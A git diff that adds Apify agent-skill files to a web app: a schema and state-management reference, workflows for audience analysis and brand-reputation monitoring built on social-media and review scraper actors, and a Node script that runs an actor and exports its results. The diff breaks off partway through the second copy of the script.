+++ b/web-app/public/skills/apify-actorization/references/schemas-and-output.md
@@ -0,0 +1,140 @@
+# Schemas and Output Configuration
+
+## Input Schema
+
+Map your application's inputs to `.actor/input_schema.json`. Validate against the JSON Schema from the `@apify/json_schemas` npm package (`input.schema.json`).
+
+```json
+{
+ "title": "My Actor Input",
+ "type": "object",
+ "schemaVersion": 1,
+ "properties": {
+ "startUrl": {
+ "title": "Start URL",
+ "type": "string",
+ "description": "The URL to start processing from",
+ "editor": "textfield",
+ "prefill": "https://example.com"
+ },
+ "maxItems": {
+ "title": "Max Items",
+ "type": "integer",
+ "description": "Maximum number of items to process",
+ "default": 100,
+ "minimum": 1
+ }
+ },
+ "required": ["startUrl"]
+}
+```
+
+### Mapping Guidelines
+
+- Command-line arguments → input schema properties
+- Environment variables → input schema or Actor env vars in actor.json
+- Config files → input schema with object/array types
+- Flatten deeply nested structures for better UX
+
+## Output Schema
+
+Define output structure in `.actor/output_schema.json`. Validate against the JSON Schema from the `@apify/json_schemas` npm package (`output.schema.json`).
+
+### For Table-Like Data (Multiple Items)
+
+- Use `Actor.pushData()` (JS) or `Actor.push_data()` (Python)
+- Each item becomes a row in the dataset
+
+### For Single Files or Blobs
+
+- Use key-value store: `Actor.setValue()` / `Actor.set_value()`
+- Get the public URL and include it in the dataset:
+
+```javascript
+// Store file with public access
+await Actor.setValue('report.pdf', pdfBuffer, { contentType: 'application/pdf' });
+
+// Get the public URL
+const storeInfo = await Actor.openKeyValueStore();
+const publicUrl = `https://api.apify.com/v2/key-value-stores/${storeInfo.id}/records/report.pdf`;
+
+// Include URL in dataset output
+await Actor.pushData({ reportUrl: publicUrl });
+```
+
+### For Multiple Files with a Common Prefix (Collections)
+
+```javascript
+// Store multiple files with a prefix
+for (const [name, data] of files) {
+ await Actor.setValue(`screenshots/${name}`, data, { contentType: 'image/png' });
+}
+// Files are accessible at: .../records/screenshots%2F{name}
+```
+
+## Actor Configuration (actor.json)
+
+Configure `.actor/actor.json`. Validate against the JSON Schema from the `@apify/json_schemas` npm package (`actor.schema.json`).
+
+```json
+{
+ "actorSpecification": 1,
+ "name": "my-actor",
+ "title": "My Actor",
+ "description": "Brief description of what the actor does",
+ "version": "1.0.0",
+ "meta": {
+ "templateId": "ts_empty",
+ "generatedBy": "Claude Code with Claude Opus 4.5"
+ },
+ "input": "./input_schema.json",
+ "dockerfile": "../Dockerfile"
+}
+```
+
+**Important:** Fill in the `generatedBy` property with the tool/model used.
+
+## State Management
+
+### Request Queue - For Pausable Task Processing
+
+The request queue works for any task processing, not just web scraping. Use a dummy URL with custom `uniqueKey` and `userData` for non-URL tasks:
+
+```javascript
+const requestQueue = await Actor.openRequestQueue();
+
+// Add tasks to the queue (works for any processing, not just URLs)
+await requestQueue.addRequest({
+ url: 'https://placeholder.local', // Dummy URL for non-scraping tasks
+ uniqueKey: `task-${taskId}`, // Unique identifier for deduplication
+ userData: { itemId: 123, action: 'process' }, // Your custom task data
+});
+
+// Process tasks from the queue (with Crawlee)
+const crawler = new BasicCrawler({
+ requestQueue,
+ requestHandler: async ({ request }) => {
+ const { itemId, action } = request.userData;
+ // Process your task using userData
+ await processTask(itemId, action);
+ },
+});
+await crawler.run();
+
+// Or manually consume without Crawlee:
+let request;
+while ((request = await requestQueue.fetchNextRequest())) {
+ await processTask(request.userData);
+ await requestQueue.markRequestHandled(request);
+}
+```
+
+### Key-Value Store - For Checkpoint State
+
+```javascript
+// Save state
+await Actor.setValue('STATE', { processedCount: 100 });
+
+// Restore state on restart
+const state = await Actor.getValue('STATE') || { processedCount: 0 };
+```
diff --git a/web-app/public/skills/apify-audience-analysis/SKILL.md b/web-app/public/skills/apify-audience-analysis/SKILL.md
new file mode 100644
index 00000000..7ce31aa7
--- /dev/null
+++ b/web-app/public/skills/apify-audience-analysis/SKILL.md
@@ -0,0 +1,121 @@
+---
+name: apify-audience-analysis
+description: Understand audience demographics, preferences, behavior patterns, and engagement quality across Facebook, Instagram, YouTube, and TikTok.
+---
+
+# Audience Analysis
+
+Analyze and understand your audience using Apify Actors to extract follower demographics, engagement patterns, and behavior data from multiple platforms.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Identify audience analysis type (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the analysis script
+- [ ] Step 5: Summarize findings
+```
+
+### Step 1: Identify Audience Analysis Type
+
+Select the appropriate Actor based on analysis needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Facebook follower demographics | `apify/facebook-followers-following-scraper` | FB followers/following lists |
+| Facebook engagement behavior | `apify/facebook-likes-scraper` | FB post likes analysis |
+| Facebook video audience | `apify/facebook-reels-scraper` | FB Reels viewers |
+| Facebook comment analysis | `apify/facebook-comments-scraper` | FB post/video comments |
+| Facebook content engagement | `apify/facebook-posts-scraper` | FB post engagement metrics |
+| Instagram audience sizing | `apify/instagram-profile-scraper` | IG profile demographics |
+| Instagram location-based | `apify/instagram-search-scraper` | IG geo-tagged audience |
+| Instagram tagged network | `apify/instagram-tagged-scraper` | IG tag network analysis |
+| Instagram comprehensive | `apify/instagram-scraper` | Full IG audience data |
+| Instagram API-based | `apify/instagram-api-scraper` | IG API access |
+| Instagram follower counts | `apify/instagram-followers-count-scraper` | IG follower tracking |
+| Instagram comment export | `apify/export-instagram-comments-posts` | IG comment bulk export |
+| Instagram comment analysis | `apify/instagram-comment-scraper` | IG comment sentiment |
+| YouTube viewer feedback | `streamers/youtube-comments-scraper` | YT comment analysis |
+| YouTube channel audience | `streamers/youtube-channel-scraper` | YT channel subscribers |
+| TikTok follower demographics | `clockworks/tiktok-followers-scraper` | TT follower lists |
+| TikTok profile analysis | `clockworks/tiktok-profile-scraper` | TT profile demographics |
+| TikTok comment analysis | `clockworks/tiktok-comments-scraper` | TT comment engagement |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `apify/facebook-followers-following-scraper`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Findings
+
+After completion, report:
+- Number of audience members/profiles analyzed
+- File location and name
+- Key demographic insights
+- Suggested next steps (deeper analysis, segmentation)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-audience-analysis/reference/scripts/run_actor.js b/web-app/public/skills/apify-audience-analysis/reference/scripts/run_actor.js
new file mode 100644
index 00000000..1a283920
--- /dev/null
+++ b/web-app/public/skills/apify-audience-analysis/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-audience-analysis-1.0.1';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-brand-reputation-monitoring/SKILL.md b/web-app/public/skills/apify-brand-reputation-monitoring/SKILL.md
new file mode 100644
index 00000000..e38a8d4a
--- /dev/null
+++ b/web-app/public/skills/apify-brand-reputation-monitoring/SKILL.md
@@ -0,0 +1,121 @@
+---
+name: apify-brand-reputation-monitoring
+description: "Track reviews, ratings, sentiment, and brand mentions across Google Maps, Booking.com, TripAdvisor, Facebook, Instagram, YouTube, and TikTok. Use when user asks to monitor brand reputation, analyze..."
+---
+
+# Brand Reputation Monitoring
+
+Scrape reviews, ratings, and brand mentions from multiple platforms using Apify Actors.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Determine data source (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the monitoring script
+- [ ] Step 5: Summarize results
+```
+
+### Step 1: Determine Data Source
+
+Select the appropriate Actor based on user needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Google Maps reviews | `compass/crawler-google-places` | Business reviews, ratings |
+| Google Maps review export | `compass/Google-Maps-Reviews-Scraper` | Dedicated review scraping |
+| Booking.com hotels | `voyager/booking-scraper` | Hotel data, scores |
+| Booking.com reviews | `voyager/booking-reviews-scraper` | Detailed hotel reviews |
+| TripAdvisor reviews | `maxcopell/tripadvisor-reviews` | Attraction/restaurant reviews |
+| Facebook reviews | `apify/facebook-reviews-scraper` | Page reviews |
+| Facebook comments | `apify/facebook-comments-scraper` | Post comment monitoring |
+| Facebook page metrics | `apify/facebook-pages-scraper` | Page ratings overview |
+| Facebook reactions | `apify/facebook-likes-scraper` | Reaction type analysis |
+| Instagram comments | `apify/instagram-comment-scraper` | Comment sentiment |
+| Instagram hashtags | `apify/instagram-hashtag-scraper` | Brand hashtag monitoring |
+| Instagram search | `apify/instagram-search-scraper` | Brand mention discovery |
+| Instagram tagged posts | `apify/instagram-tagged-scraper` | Brand tag tracking |
+| Instagram export | `apify/export-instagram-comments-posts` | Bulk comment export |
+| Instagram comprehensive | `apify/instagram-scraper` | Full Instagram monitoring |
+| Instagram API | `apify/instagram-api-scraper` | API-based monitoring |
+| YouTube comments | `streamers/youtube-comments-scraper` | Video comment sentiment |
+| TikTok comments | `clockworks/tiktok-comments-scraper` | TikTok sentiment |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `compass/crawler-google-places`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Results
+
+After completion, report:
+- Number of reviews/mentions found
+- File location and name
+- Key fields available
+- Suggested next steps (sentiment analysis, filtering)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-brand-reputation-monitoring/reference/scripts/run_actor.js b/web-app/public/skills/apify-brand-reputation-monitoring/reference/scripts/run_actor.js
new file mode 100644
index 00000000..edc49c68
--- /dev/null
+++ b/web-app/public/skills/apify-brand-reputation-monitoring/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-brand-reputation-monitoring-1.1.1';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
